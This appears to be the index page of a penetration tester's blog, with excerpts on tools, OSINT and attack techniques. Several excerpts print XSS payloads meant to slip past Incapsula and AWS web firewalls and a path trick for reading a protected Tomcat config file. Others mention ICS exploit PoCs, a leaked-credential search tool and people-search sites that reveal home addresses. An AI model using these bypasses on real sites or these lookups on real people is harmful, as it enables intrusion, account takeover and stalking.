Where OSINT, Hacking, Penetration Testing, Privacy, Piracy, Information Security, Cyber Security and Law are a lifestyle.
Hi Guys, Time some more hacker's TLC. Or Tips and tricks for penetration testers! Anyway, here we go! Technique: 2 Incapsula WAF XSS Bypasses I haven't had a chance to use these yet but I do encounter Incapsula once in a while so I'll keep then in my bag <iframe/onload='this["src"]="javas	cript:al"+"ert``"';> <img/src=q onerror='new Function`al\ert\`1\``'> Source Tool: … Continue reading Technique, Tool and Lecture #6
Wow, so it's been two years or so since I found these two vulnerabilities in an Industrial Control System (ICS) while doing an external penetration test. Before we continue, if you're unsure what an ICS is, here is a link with a definition. With that out of the way, here we go! I fixed up … Continue reading PoC for CVE-2017-16744 and CVE-2017-16748
People search engines are all the rage at this moment in history. New ones appear online and go offline just as fast. These are the sites like thatsthem.com where you put in a first and last name and you get a list of addresses and other information. What if I told you that there are people search engines to find out where someone lives or who lives at what address completely free and ran by the government? Would you believe me?
Internet Hygiene or an individual's Operation Security (OpSec) is how aware and careful you are when you use the internet. Whether it be surfing the web, playing games or using social media you are constantly leaking information. In my example today, I took a license plate from an ebay posting Then I used a search … Continue reading Internet Hygiene
Technique: Quick and Easy Bypass for Tomcat 8 on Windows https://x.x.x.x/WEB-INF/web.xml -> 403 Forbidden https://x.x.x.x/./WEB-INF/web.xml -> 403 Forbidden https://x.x.x.x/.//WEB-INF/web.xml -> 200 OK Haven't had a chance to use this yet, but I'm sure I will soon Source Tool: Karma So awesome! Lets you search by username, domain or password. For example I can search by … Continue reading Technique, Tool and Lecture #5
Another round of techniques, tools and lectures 😀 Technique: This time it is not as much as of a technique but a trove of resources! I have found many resources for books/publications relevant to my career. I'll admit, I'm much more of a fan of physical copies. That said, if you're okay with PDFs then … Continue reading Technique, Tool and Lecture #4
Time for another entry of Technique, Tool and Lecture! Technique: <!<script>alert(1)</script> The key point is the <! which one researcher found sometimes allow bypassing AWS WAF. Yes, that simple... Source Tool:Â Spiderfoot, a great tool for both semi-active and passive reconnaissance! Here are a list of modules that I run when I am at the … Continue reading Technique, Tool and Lecture #3
Burp Suite is definitely the most used tool for me on a daily basis since I started my new job. Which is funny in a way because in my old job, I found myself relying too heavily on it and trusting it way too much. That said, it is also my favorite tool. Don't get … Continue reading Burp Suite Extensions